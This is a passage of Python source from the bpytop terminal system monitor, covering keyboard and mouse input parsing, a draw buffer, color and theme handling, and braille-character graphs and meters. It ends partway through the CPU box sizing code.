def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting an IO block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go through dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
if not all(0 <= c <= 255 for c in self.dec):
raise ValueError(f'One or more RGB values are out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
if not CONFIG.truecolor or LOW_COLOR:
self.escape = f'{self.truecolor_to_256(rgb=self.dec, depth=self.depth)}'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
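#* Convert an RGB tuple to the nearest 256-color escape sequence (greyscale ramp 232-255 or the 6x6x6 color cube starting at index 16)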
@staticmethod
def truecolor_to_256(rgb: Tuple[int, int, int], depth: str="fg") -> str:
out: str = ""
pre: str = f'\033[{"38" if depth == "fg" else "48"};5;'
greyscale: Tuple[int, int, int] = ( rgb[0] // 11, rgb[1] // 11, rgb[2] // 11 )
if greyscale[0] == greyscale[1] == greyscale[2]:
out = f'{pre}{232 + greyscale[0]}m'
else:
out = f'{pre}{round(rgb[0] / 51) * 36 + round(rgb[1] / 51) * 6 + round(rgb[2] / 51) + 16}m'
return out
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{c};{c};{c}m'
else:
color = f'{Color.truecolor_to_256(rgb=(c, c, c), depth=depth)}'
elif len(hexa) == 7:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
else:
color = f'{Color.truecolor_to_256(rgb=(int(hexa[1:3], base=16), int(hexa[3:5], base=16), int(hexa[5:7], base=16)), depth=depth)}'
except ValueError as e:
errlog.exception(f'{e}')
else:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{r};{g};{b}m'
else:
color = f'{Color.truecolor_to_256(rgb=(r, g, b), depth=depth)}'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
no_zero: bool
round_up_low: bool
current: bool
last: int
lowest: int = 0
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None, no_zero: bool = False, round_up_low: bool = False):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
self.round_up_low = round_up_low
self.no_zero = no_zero or round_up_low
if not data: data = [0]
if max_value:
self.lowest = 1 if self.round_up_low else 0
self.max_value = max_value
data = [ min_max((v + offset) * 100 // (max_value + offset), min_max(v + offset, 0, self.lowest), 100) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
		if value_width > width: #* If the given data set is larger than the graph width, shrink the data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
		elif value_width < width: #* If the given data set is smaller than the graph width, pad the graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if self.no_zero and not (new and v == 0 and side == "left") and h == self.height - 1 and value[side] < 1 and not (self.round_up_low and val == 0): value[side] = 1
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else (THEME.inactive_fg if self.last < 5 else self.colors[self.last])}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = min_max((value + self.offset) * 100 // (self.max_value + self.offset), min_max(value + self.offset, 0, self.lowest), 100)
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
disk_io: Dict[str, Dict[str, Graph]] = {}
class Meter:
'''Creates a percentage meter
	__init__(value, width, gradient_name, invert=False) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
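	# Minimal usage sketch (hypothetical values, not part of the original module):
	#   m = Meter(value=50, width=20, gradient_name="cpu")
	#   out = m(75)  # re-render the meter at 75% and return it as a string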
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
		elif value < 0: value = 0 #* clamp negatives to an empty meter
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
		elif value < 0: value = 0 #* clamp negatives to an empty meter
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
num: int = 0
boxes: List = []
view_modes: Dict[str, List] = {"full" : ["cpu", "mem", "net", "proc"], "stat" : ["cpu", "mem", "net"], "proc" : ["cpu", "proc"]}
view_mode: str
for view_mode in view_modes:
if sorted(CONFIG.shown_boxes.split(), key=str.lower) == view_modes[view_mode]:
break
else:
view_mode = "user"
view_modes["user"] = CONFIG.shown_boxes.split()
height_p: int
width_p: int
x: int
y: int
width: int
height: int
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
c_counter: int = 0
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
"/uptime" : "",
}
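	#* The placeholders above can be mixed with normal strftime() codes in CONFIG.draw_clock,
	#* e.g. "%X /host" (illustrative); draw_clock() substitutes them after formatting the time.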
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
cls.boxes = CONFIG.shown_boxes.split()
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
if not "cpu" in cls.boxes: return
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
if not "cpu" in cls.boxes or not cls.clock_on: return
cls.c_counter += 1
if cls.c_counter > 3600 / (Config.update_ms / 1000):
tzset()
cls.c_counter = 0
out: str = ""
if force: pass
elif Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
for custom in cls.clock_custom_format:
if custom in clock_string:
if custom == "/uptime": cls.clock_custom_format["/uptime"] = CpuCollector.uptime
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def empty_bg(cls) -> str:
return (f'{Term.clear}' +
(f'{Banner.draw(Term.height // 2 - 10, center=True)}'
f'{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}[esc] Menu'
f'{Mv.r(25)}{Fx.i}Version: {VERSION}{Fx.ui}' if Term.height > 22 else "") +
f'{Mv.d(1)}{Mv.l(34)}{Fx.b}All boxes hidden!'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[1] {Fx.ub}Toggle CPU box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[2] {Fx.ub}Toggle MEM box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[3] {Fx.ub}Toggle NET box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[4] {Fx.ub}Toggle PROC box'
f'{Mv.d(1)}{Mv.l(19)}{Fx.b}[m] {Fx.ub}Cycle presets'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[q] Quit {Fx.ub}{Term.bg}{Term.fg}')
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
out: str = ""
if not cls.boxes:
out = cls.empty_bg()
else:
out = "".join(sub._draw_bg() for sub in cls.__subclasses__()) # type: ignore
Draw.buffer("bg", out, now=now, z=1000, only_save=Menu.active, once=True)
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
num = 1
x = 1
y = 1
height_p = 32
width_p = 100
min_w: int = 60
min_h: int = 8
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "cpu" in cls.boxes:
Box._b_cpu_h = 0
cls.width = Term.width
return
cpu = CpuCollector
height_p: int
if cls.boxes == ["cpu"]:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
